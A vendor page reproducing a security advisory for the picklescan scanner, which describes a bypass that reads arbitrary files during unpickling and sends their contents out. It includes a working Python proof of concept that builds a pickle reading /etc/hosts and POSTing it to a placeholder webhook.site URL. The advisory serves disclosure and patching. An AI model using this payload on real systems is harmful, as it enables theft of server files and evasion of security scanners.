Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

GHSA-9726-w42j-3qjr

picklescan has Arbitrary file read using `io.FileIO`
Back to all
CVE

GHSA-9726-w42j-3qjr

picklescan has Arbitrary file read using `io.FileIO`

Summary

Unsafe pickle deserialization allows unauthenticated attackers to read arbitrary server files and perform SSRF. By chaining io.FileIO and urllib.request.urlopen, an attacker can bypass RCE-focused blocklists to exfiltrate sensitive data (example: /etc/passwd) to an external server.

Details

The application deserializes untrusted pickle data. While RCE keywords (os, exec) may be blocked, the exploit abuses standard library features:

  1. io.FileIO: Opens local files without using builtins.open.
  2. urllib.request.urlopen: Accepts the file object as an iterable body for a POST request.
  3. Data Exfiltration: The file content is streamed directly to an attacker-controlled URL during unpickling.

PoC

import pickle, io, urllib.request
class GetFile:
    def __reduce__(self):
        return (io.FileIO, ('/etc/hosts', 'r'))
class Exfiltrate:
    def __reduce__(self):
        return (urllib.request.urlopen, ('https://webhook.site/YOUR_UUID_HERE', GetFile()))
with open("bypass_http.pkl", "wb") as f:
    pickle.dump(Exfiltrate(), f)

<img width="650" height="114" alt="Screenshot 2025-12-30 at 10 13 14 PM" src="https://github.com/user-attachments/assets/4edf9640-80f6-4701-ae87-cff1079e2994" />

Impact

  • Arbitrary file read

Thanks for this library and your time. If you think picklescan is focused on detecting only RCE kind of vulnerabilities rather adding File IOHttp or any protocol based may cause lot of noise, feel free to close this issue.

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
-
C
H
U
0
-
C
H
U
9.1
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N

Related Resources

No items found.

References

https://github.com/mmaitre314/picklescan/security/advisories/GHSA-9726-w42j-3qjr, https://github.com/mmaitre314/picklescan/pull/55, https://github.com/mmaitre314/picklescan/commit/a01c58d5dd7960db557b849817c0ab83ab111ef1, https://github.com/mmaitre314/picklescan, https://github.com/mmaitre314/picklescan/releases/tag/v0.0.35

Severity

9.1

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
9.1
EPSS Probability
0%
EPSS Percentile
0%
Introduced Version
0,0.0.1,0.0.3,0.0.5,0.0.7,0.0.15
Fix Available
0.0.35

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading